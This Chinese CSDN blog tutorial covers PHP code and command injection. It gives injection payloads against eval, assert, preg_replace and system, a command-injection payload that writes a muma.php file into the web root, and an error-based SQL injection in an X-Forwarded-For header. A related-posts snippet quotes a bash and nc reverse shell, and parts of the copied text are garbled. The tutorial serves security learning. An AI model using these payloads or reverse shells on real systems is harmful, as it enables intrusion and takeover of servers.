渗透测试-SQL注入-代码与命令注入

于 2023-12-06 11:51:09 发布
阅读量949 收藏 21
点赞数 13
分类专栏: 渗透测试 SQL注入 文章标签: sql 数据库 web安全 网络 学习 mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fjc0214/article/details/134820077
版权

渗透测试-SQL注入-代码与命令注入

一、代码注入

eval函数

在PHP中,使用eval(string)函数可以执行任意有效的PHP代码,比如eval(“phpinfo0;”)、eval(“echo date()”),也可以是更加复杂的代码,比如@eval($_POST[‘code’]);代码,用户提交POST请求参数如下:

code=$a=10;$b=20;print($a+$b);

code=$time1 = "2022-11-03 18:52:03";
$time2 = "2022-11-03 18:52:09";
echo (strtotime($time2)-strtotime($time1))

// 或者更加复杂的代码:
code=$conn = mysqli_connect('127.0.0.1','root','数据库密码','learn');
mysqli_set_charset($conn,'utf8');
$result = mysqli_query($conn, "select * from user");
$rows = mysqli_fetch_al1($result);
var_dump($rows);

assert函数

assert函数用于判断一个表达式是否成立,所以会先执行该表达式,进而达到判断的目的。所以assert相对于eval来说,功能要简单一些,只能执行表达式,但是依然可以达到执行代码的目的,比如针对 @assert($_POST[‘code’]);的代码,用户提交的POST请求如下:

code=phpinfo();
code=print(date("Y-m-d"));

// 除此之外,我们也可以构造让assert函数执行eval()函数的Payload:
Code=eval('$timel = "2022-11-03 18:52:03";
$time2 = "2022-11-03 18:52:09";
echo (strtotime($time2)-strtotime($time1));');

preg replace函数

针对@pre_replace(“/test/e”,$POST[‘code’],“test”);构造的Payload如下:

code = phpinfo();
code = print(date("Y-m-d"))
code = @eval('$a=10;$b=30;print($a+$b);')

create_function()函数

create_function主要用来创建匿名函数,以下展示了其代码和Payload:

$func = create_function('',$_POST['code']);
$func();

code=phpinfo();
code=$a=11;$b=30;print($a+$b);
code=eval('$a=11;$b=30;print($a+$b);');

反序列化漏洞也属于代码注入

二、命令注入

在PHP中,可以直接执行操作系统的命令,函数包括:system,exec,popen,paassthru,shell_exec等

system($_POST['code']);       #自带回显
passthru($_POST['code']);

echo exec($_POST['code']);    #echo 回显
echo shell_exec($_PoST['code']);

另外一种命令注入的方式,后台直接执行系统命令,而前端参数传入的值是命令的一部分,则也会构成命令注入漏洞。
比如后台执行命令:sudo firewall-cmd–add-port= p o r t / port/ port/protocol,而port参数是由前台用户传入的,构建的Payload如下:

80/tcp --permanent; echo "Hello world" > /opt/1ampp/htdocs/security/temp/muma.php;

三、HTTP头注

HTTP头被插入数据库,构建出了insert语句,那么头信息只要构造为:

$useragent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$xforward = $_SERVER['HTTP_X_FORWARDED_FOR'];
$ipaddr = $_SERVER['REMOTE_ADDR'];

$sql = "insert into header(useragent,referer,xforward,ipaddr) values('$useragent','$referer','$xforward','$ipaddr')";
$conn->query($sql);
echo mysqli_error($conn);
echo "Welcome Here";

Payload:

GET /security/misc.php HTTP/1.1
Host: 192.168.88.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://www.fjczzlly.com
X-Forwarded-For:' or updatexml(1,concat(0x7e,database(),0x7e),1) or '
Cookie: PHPSESSID=5kb639h750ekb40fpf36c1uopq
Upgrade-Insecure-Requests: 1

HTTP请求头的获取方式

$_SERVER['HTTP_ACCEPT_LANGUAGE']//浏览器语言 
$_SERVER['REMOTE_ADDR'] //当前用户 IP 。 
$_SERVER['REMOTE_HOST'] //当前用户主机名 
$_SERVER['REQUEST_URI'] //URL

$_SERVER['REMOTE_PORT'] //端口。 
$_SERVER['SERVER_NAME'] //服务器主机的名称。 
$_SERVER['PHP_SELF']//正在执行脚本的文件名 
$_SERVER['argv'] //传递给该脚本的参数。 
$_SERVER['argc'] //传递给程序的命令行参数的个数。 
$_SERVER['GATEWAY_INTERFACE']//CGI 规范的版本。 
$_SERVER['SERVER_SOFTWARE'] //服务器标识的字串 
$_SERVER['SERVER_PROTOCOL'] //请求页面时通信协议的名称和版本 
$_SERVER['REQUEST_METHOD']//访问页面时的请求方法 
$_SERVER['QUERY_STRING'] //查询(query)的字符串。 
$_SERVER['DOCUMENT_ROOT'] //当前运行脚本所在的文档根目录 
$_SERVER['HTTP_ACCEPT'] //当前请求的 Accept: 头部的内容。 
$_SERVER['HTTP_ACCEPT_CHARSET'] //当前请求的 Accept-Charset: 头部的内容。 
$_SERVER['HTTP_ACCEPT_ENCODING'] //当前请求的 Accept-Encoding: 头部的内容 
$_SERVER['HTTP_CONNECTION'] //当前请求的 Connection: 头部的内容。例如:“Keep-Alive”。 
$_SERVER['HTTP_HOST'] //当前请求的 Host: 头部的内容。 
$_SERVER['HTTP_REFERER'] //链接到当前页面的前一页面的 URL 地址。 
$_SERVER['HTTP_USER_AGENT'] //当前请求的 User_Agent: 头部的内容。 
$_SERVER['HTTPS']//如果通过https访问,则被设为一个非空的值(on),否则返回off 
$_SERVER['SCRIPT_FILENAME'] #当前执行脚本的绝对路径名。 
$_SERVER['SERVER_ADMIN'] #管理员信息 
$_SERVER['SERVER_PORT'] #服务器所使用的端口 
$_SERVER['SERVER_SIGNATURE'] #包含服务器版本和虚拟主机名的字符串。 
$_SERVER['PATH_TRANSLATED'] #当前脚本所在文件系统(不是文档根目录)的基本路径。 
$_SERVER['SCRIPT_NAME'] #包含当前脚本的路径。这在页面需要指向自己时非常有用。 
$_SERVER['PHP_AUTH_USER'] #当 PHP 运行在 Apache 模块方式下,并且正在使用 HTTP 认证功能,这个变量便是用户输入的用户名。 
$_SERVER['PHP_AUTH_PW'] #当 PHP 运行在 Apache 模块方式下,并且正在使用 HTTP 认证功能,这个变量便是用户输入的密码。 
$_SERVER['AUTH_TYPE'] #当 PHP 运行在 Apache 模块方式下,并且正在使用 HTTP 认证功能,这个变量便是认证的类型
$_SERVER['HTTP_X_FORWARDED_FOR'] #获取原 IP

任何可以导致代码执行、命令执行、数据库读写的操作,均可以被称为注入。

chengstery
关注
  • 13
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
代码审计】命令注入代码注入
TeamsSix 的 CSDN 空间
11-21 4575
0x01 命令注入 在开发过程中,开发人员可能需要对系统文件进行移动、删除或者执行一些系统命令,这时如果执行的命令用户可控,就会导致命令执行漏洞。 1、示例 当命令可控时,就可能会导致命令注入,例如以下代码: String cmd = request.getParameter("cmd"); Runtime.getRuntime().exec(cmd); 这种漏洞原理很简单,主要就是找到执行系统命令的函数,看命令是否可控。 java 程序中执行系统命令的函数如下: Runtime.exec Process
深入理解Java应用开发中的注入攻击及其防护策略
里查叔叔
03-10 754
注入攻击是Java应用开发中常见的安全威胁之一,对应用程序的安全性和稳定性构成严重威胁。为了保护应用程序免受注入攻击的侵害,开发者需要采取一系列综合的防护策略,包括输入验证与过滤、参数化查询、最小权限原则、安全编码与审计、安全更新与补丁管理以及监控与日志记录等。只有全面考虑并应用这些防护策略,我们才能确保Java应用的安全性和稳定性。
渗透测试——三、脚本编写
钟言的博客
12-02 5276
本篇为渗透测试的第三课,黑客实践之脚本编写,详细内容包含了:认识Python语言 1、Python语言概况 2、Python的特点 3、Python集成开发环境 4、Python环境的安装 编写Python扫描程序 1、Python 第三方模块 2、Socket模块 3、Scapy模板 4、利用Nmap模板扫描存活主机 5、构造TCP包扫描端口 6、利用Socket模块扫描端口 编写Python攻击脚本 1、ARP协议 2、SYN泛洪 3、字典攻击4、ARP欺骗攻击 5、SYN泛洪攻击 6、生成数据字典等等
kali综合渗透测试-常用代码
W小哥
04-09 1493
命令执行漏洞反弹shell代码: echo “bash -i >& /dev/tcp/192.168.56.102/6666 0>&1” | bash burpsuite抓包修改用户名密码的数据包内容代入数据库执行,反弹shell语句 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168...
渗透测试-命令执行注入
lza20001103的博客
07-20 2860
渗透测试-命令执行注入
代码规范系列|黑盒挖掘-命令注入
白帽子凯哥聊黑客
03-10 92
1、前言命令注入是什么?程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些执行系统命令的函数。当用户可控点可以使用管道符进行命令拼接,或者参数点的过滤不严格,从而可以被绕过,就有可能会导致Web服务器程序权限被继承,去执行系统命令、读写文件、反弹shell、甚至控制整个服务器等危害。
代码注入命令注入
ppbgi的博客
03-24 1302
代码注入代码执行) 漏洞简介 代码执行漏洞是指应用程序本身过滤不严格,攻击者可以通过请求将代码注入到应用中,最终在wen服务器中执行。类似SQL注入,sql注入是将SQL语句带入数据库查询,而代码注入,是代码注入到脚本带入到对应代码进行解析,但是危害相当于一个web后门的存在。 漏洞成因 由于服务器存在于执行的函数,在使用的过程中没有做好严格的控制,造成了实际的参数在客户端中可控。 漏洞危害 1、敏感信息泄露 2、webshel获取 3、命令执行 4、任意文件读取 5、权限提升 代码注入
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
31-31.渗透测试SQL注入盲注
05-10
渗透测试SQL注入盲注
35-35.渗透测试SQL注入之SQL注入防御
最新发布
05-10
35-35.渗透测试SQL注入之SQL注入防御
渗透测试项目
02-10
渗透测试项目
29-29.渗透测试之SQL注入基础(上)
05-10
渗透测试之SQL注入基础(上)
网络安全必学渗透测试流程
m0_58477260的博客
03-03 199
这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解渗透测试的流程有很好的帮助。靶场地址:vm=Hundred靶场基本情况:KALI靶机:192.168.1.3/24主机:192.168.1.146/24目标:普通用户flag和管理员flag。
【java代码审计】命令注入
m0_52923241的博客
02-28 1460
开发者在某种开发需求时,需要引入对系统本地命令的支持来完成某些特定的功能,此时若未对用户的输入做严格的过滤,就可能发生命令注入
python信息收集、渗透测试工具源代码,带图形界面
Python代码大全
11-04 1514
该模块原本准备是将其他所有模块集合并进行调用,但是还是因为没有使用多线程的原因,速度太慢了,所以就准备使用fofa的接口进行数据的查询。在icp的接口选择中我第一选择的是免费接口,我都写的差不多了才发现那个接口是多么的不稳定,应该是做了查询限制,每查询几次后那个接口的服务器就会爆500的错误状态码。仅支持尝试获取后台地址以及部分敏感文件的泄漏的扫描,原因还是没有使用多线程,所以速递极慢,为了在答辩的时候演示不尬,字典仅有五十几条。该模块调用站长之家备案信息接口以及免费的whois查询接口。
【OS命令注入】常见OS命令执行函数以及OS命令注入利用实例以及靶场实验—基于DVWA靶场
m0_64378913的博客
06-26 2328
背景:程序员使用脚本语言(如PHP等)开发应用程序过程中,脚本语言开发十分快速、简洁、方便,但是也伴随着一些问题,比如速度慢、无法触及系统底层等。开发的应用时,特殊是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件),当应用需要调用一些外部程序时就会用到一些系统命令的函数。OS命令注入:当应用在调用这些系统命令函数时,如果将用户的输入作为系统命令的参数拼接到命令中,在没有过滤用户输入的情况下,就会造成命令执行漏洞。条件:漏洞危害:作用:该函数能够将字符串作为OS命令执行,自带输出功能。
编程代码:大神教你如何进行渗透测试
C语言C++学习俱乐部:765860056
12-27 3544
使用关键词得到目标源码 前言:对某网站进行渗透测试,此次渗透给的是一个主域名,并且也没有子域,打开了目标网站先对其进行一波信息收集 中间件: IIS 8.5 输入admin发现自动添加了/ 说明其目录存在,那么盲猜一波文件,login.aspx default.aspx main.aspx 等等 最终在login.aspx下面发现后台登录页面。这不猜他一波弱口令?? 一顿操作过后账号被锁 熟悉的开局,既然如此只能尝试其他方法了。 在主页的html代...
渗透测试--DVWA命令注入
qq_45070118的博客
07-30 1764
DVWA 命令注入:利用各种调用系统命令的web应用,通过命令拼接、绕过黑名单等方式实现在服务端实现想要实现的系统命令。 如何配置登陆看我的burpsuite爆破文章中就有 这次我分为linux和windows两个版本登录时分别把登陆网址的IP改为目标系统的IP即可 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应...
SQL注入渗透测试的实施步骤
06-03
SQL注入渗透测试的实施步骤如下: 1. 收集信息:首先需要收集关于目标应用程序和数据库的信息,例如应用程序的URL、数据库类型、应用程序的输入点等。这可以通过手动或自动化的方式来完成,例如使用Web应用程序扫描工具(如Burp Suite、OWASP ZAP等)或数据库扫描工具(如sqlmap、Nessus等)。 2. 确定注入点:在收集信息后,需要确定应用程序中的注入点。注入点是应用程序中的输入点,攻击者可以通过它们将恶意的SQL代码注入到应用程序中。常见的注入点包括Web表单、URL参数、HTTP头等。 3. 确认注入漏洞:在确定注入点后,需要确认是否存在SQL注入漏洞。这可以通过手动注入或使用SQL注入工具来完成。手动注入需要对注入点进行测试,并尝试构造恶意的SQL代码来验证是否存在漏洞。使用SQL注入工具可以自动化这个过程,例如使用sqlmap工具可以检测和利用大多数SQL注入漏洞。 4. 利用注入漏洞:一旦确认存在注入漏洞,攻击者可以利用它来执行恶意的SQL代码。攻击者可以使用SQL注入工具或手动编写SQL代码来执行各种操作,例如提取敏感数据、修改数据、删除数据或执行任意代码。 5. 提高权限:如果攻击者成功地利用了SQL注入漏洞,他们可以尝试提高权限并获取更高的访问权限。例如,攻击者可以通过注入恶意代码来获取管理员权限,或者通过注入代码来获取其他用户的密码。 6. 覆盖踪迹:在攻击完成后,攻击者需要删除所有的攻击痕迹,以避免被发现。这可以通过删除日志、修改数据库记录等方式来实现。 7. 编写测试报告:最后,需要编写测试报告,记录测试的过程、结果和建议的修复措施。测试报告应该是清晰、准确和详细的,以便组织能够了解测试的结果和建议的改进措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值